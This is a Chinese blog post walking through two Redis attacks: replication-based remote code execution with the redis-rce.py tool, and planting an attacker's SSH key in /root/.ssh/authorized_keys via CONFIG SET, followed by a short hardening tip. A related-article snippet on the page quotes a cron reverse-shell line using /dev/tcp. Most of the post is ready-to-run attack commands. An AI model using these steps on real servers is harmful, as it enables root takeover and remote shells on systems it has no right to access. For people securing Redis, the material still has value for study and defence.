Redis主从漏洞和远程连接漏洞

已于 2022-02-16 16:58:05 修改
阅读量3.7k 收藏 2
点赞数
分类专栏: Linux Redis 文章标签: redis 安全
于 2022-02-16 16:57:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leezhejue/article/details/122967269
版权
Linux 同时被 2 个专栏收录
11 篇文章 1 订阅
订阅专栏
Redis
1 篇文章 0 订阅
订阅专栏

主从复制漏洞:

参考文章:Redis主从复制getshell技巧 - Bypass - 博客园

1.so和rce文件下载:GitHub - LeeZBug/redis-rce: Redis 4.x/5.x RCE

下载后安装所需要的python库,pip install -r requirement.txt

2.运行rce

python redis-rce.py -r [target_ip] -L [attack_ip] -a [redis_require_password] -f module.so

选择i回车进入交互式shell,即可运行命令等

# root用户下运行redis且在redis密码被泄露,即可通过该漏洞获得root权限。可以运行systemctl start xxx.service等命令

写入公钥远程执行漏洞

1.在攻击主机上生成公钥(~/.ssh/id_rsa.pub)

2.运行命令生成格式化的公钥

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > /root/foo.txt

3.在攻击主机上连接被攻击redis,清空数据,并设置键值

redis-cli -h [target_ip] [-a redis_password] flushall cat /root/foo.txt | ./redis-cli -h [target_ip] -x [-a redis_password] set crackit

-x 选项允许命令从标准输出中读取并设置为最后一个参数,成为set的键的值

此时redis中只存储了一个键值对

4.通过命令行修改redis配置文件,将键值持久到文件中

redis-cli -h [target_ip] [-a redis_password] config set dir /root/.ssh config set dbfilename "authorized_keys"

save

此时,redis会将键值持久化到 /root/.ssh/authorized_keys文件中

5.成功远程连接被攻击主机

ssh root@[target_ip]

# 在redis密码被泄露,即可通过该漏洞获得root远程连接权限。

解决方案:

以上两个漏洞均会使用到redis自带的config命令,通过对dir,dbfilename等配置进行修改达到获得root权限。并设置安全的redis密码

可以对redis的配置文件(redis.conf)进行修改增加以下配置,禁用或赋予config命令一个新的名称增加安全性

# 禁用CONFIG命令
rename-command CONFIG "" 
# 重命名CONFIG命令
rename-command CONFIG "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852

LeeZhejie
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis未授权访问漏洞
m0_61506558的博客
09-10 856
VNC是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件,由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于UNXI和Linux的免费开源软件,由VNC Server和VNC View两部分组成。VNC默认端口号为5900、5901。VNC未授权访问漏洞如果被利用可能造成恶意用户直接控制target主机。
Redis漏洞总结
2301_77498991的博客
04-10 678
主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。Redis的持久化使得机器即使重启数据也不会丢失,因为redis服务器重启后会把硬盘上的文件重新恢复到内存中。但是要保证硬盘文件不被删除,而主从复制则能解决这个问题,主redis的数据和从redis上的数据保持实时同步,当主redis写入数据是就会通过主从复制复制到其它从redis
Redis 4.x5.x 未授权访问漏洞Redis基于主从复制的RCE)
黑白的博客
12-06 1999
声明 好好学习,天天向上 漏洞描述 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。 影响范围 SaltStack < 2019.2.4 SaltStack &l
Redis-主从复制(一)
全力奔跑,梦在彼岸
09-02 344
什么是主从复制? &nbsp;&nbsp;&nbsp;&nbsp;将一台redis服务器的数据,复制到其他的redis服务器,前者称为主节点,后者称为从节点,数据的复制是单向的,只能由主节点复制到从节点。 &nbsp;&nbsp;&nbsp;&nbsp;默认情况下,每台redis服务器都是主节点,一个主节点可以有多个从节点(或者没有),但一个从节点只能有一个主节点。 主从复制的作用? &n...
Redis主从复制看这篇就够了
09-05 135
什么是主从复制 持久化保证了即使 redis 服务重启也会丢失数据,因为 redis 服务重启后会将硬盘上持久化的数据恢复到内存中,但是当 redis 服务器的硬盘损坏了可能会导致数据丢失,如果通过 red...
redis未授权漏洞主从复制rce漏洞利用
weixin_30675967的博客
07-11 940
  未授权无需认证访问内部数据库。 利用计划任务反弹shell redis-cli -h 192.168.2.6 set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n" config set dir /var/spool/cron/ config set dbfilename root...
Redis漏洞复现——Redis 4.x/5.x 未授权访问漏洞
Aquarius_ego的博客
03-30 4557
Redis 4.x/5.x 未授权访问漏洞复现
Redis未授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1300
redis未授权访问漏洞是一个由于redis服务版本较低其未设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。
redis主从复制漏洞 redis主从复制命令
lxw1844912514的博客
04-10 113
1、主从复制1.1、主从复制是什么行话:也就是我们所说的主从复制,主机数据更新后根据配置和策略, 自动同步到备机的master/slaver机制,Master以写为主,Slave以读为主1.2、主从复制能干嘛•读写分离•容灾恢复1.3、主从复制怎么玩准备工作•配从(库)不配主(库)从库配置命令:slaveof 主库IP 主库端口每次与master断开之后,都需要重新连接,除非你配置进redi...
Redis基于主从复制的RCE
m0_58596609的博客
10-13 2491
Redis基于主从复制的RCE
redis主从复制究极大坑。(CentOS7)
qq_42394457的博客
05-12 208
我直接点吧 。 把 redis.config 里的 bind 绑定的端口注释掉,把protected mode yes改为 protected mode no 把master主机防火墙关掉,把slave防火墙关掉 先开master,再开slave的redis ...
redis主从复制漏洞/安全通告-Redis未授权访问漏洞_详细渗透知识点
最新发布
2401_84915584的博客
08-07 209
漏洞描述Redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略(比如添加防火墙规则避免其他非信任来源ip访问等),在没有设置密码认证(默认为空)的情况下
redis主从复制
weixin_63231007的博客
02-28 1784
redis主从复制原理以及简单演示(环境真难搭)
Redis的RCE漏洞
midi
02-13 1767
前言 做ssrf时碰到个redis主从复制([网鼎杯 2020 玄武组]SSRFMe) writeup <?php if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){ highlight_file(__FILE__); } if(isset($_POST['file'])){ file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file'])
redis主从复制详解
qq_48033003的博客
05-14 254
一.主从复制简介 1.互联网“三高”架构 高并发 高性能 高可用 面对大量的用户的同时使用,你的服务器撑得住吗? 2.你的“Redis”是否高可用 单机redis的风险与问题 问题1.机器故障 现象:硬盘故障、系统崩溃 本质:数据丢失,很可能对业务造成灾难性打击 结论:基本上会放弃使用redis. 问题2.容量瓶颈 现象:内存不足,从16G升级到64G,从64G升级到128G,无限升级内存 本质:穷,硬件条件跟不上 结论:放弃使用redis 结论: 为了避免单点Redis服务器故障,准备多
Redis(十)【主从复制
Vinjcent
05-17 366
当后面的哨兵也检测到主服务器不可用,并且数量达到一定值时,那么哨兵之间就会进行一次投票,投票的结果由一个哨兵发起,进行 failover [故障转移] 操作。Master 接到命令,启动后台的存盘进程,同时收集所有接收到的用于修改数据集命令,在后台进程执行完毕之后,master 将传送整个数据文件到 Slave,并且完成一次完全同步。哨兵模式是一种特殊的模式,首先 Redis 提供了哨兵的命令,哨兵是一个独立的进程,作为进程,它会独立运行。如果主机(6379)重新连回,只能归并到新的主机下,作为从机。...
Redis漏洞利用的4种方法
qq_50854662的博客
05-13 4605
Redis简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。区别的是redis会周期性的把更
Redis主从复制进阶常见问题解决
qq_30358827的博客
01-12 834
Redis主从复制进阶常见问题解决 在还没讲哨兵之前,我自己先列举了几个比较容易遇到的问题,并且可以手动人为的去控制。 1.复制数据延迟 主从复制延迟多少都会有的,只能减轻 可以通过 info replication 的 offset 指标进行排查监控偏移量 offset 。对于无法容忍大量延迟场景,可以编写外部监控程序监听主从节点的复制偏移量,当延迟较大时触发报警或者通知客户端避免读取延迟过高的从节点 同时从节点的 slave-serve-stale-data 参数也与此有关,它控制这种情况下从节
Redis 基于主从复制的 RCE 利用方式
systemino的博客
07-14 4342
作者:LoRexxar’@知道创宇404实验室 在2019年7月7日结束的WCTF2019 Final上,LC/BC的成员Pavel Toporkov在分享会上介绍了一种关于redis新版本的RCE利用方式,比起以前的利用方式来说,这种利用方式更为通用,危害也更大,下面就让我们从以前的redis RCE利用方式出发,一起聊聊关于redis的利用问题。PHP大马 https://201...
redis主从模式从机连接超时
09-20
redis主从模式从机连接超时时,可能有以下几个原因: 1. 网络连接问题:检查从机与主机之间的网络连接是否正常,确保网络通畅,没有防火墙或其他网络配置问题。 2. 配置错误:检查从机的配置文件,确保配置正确地...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值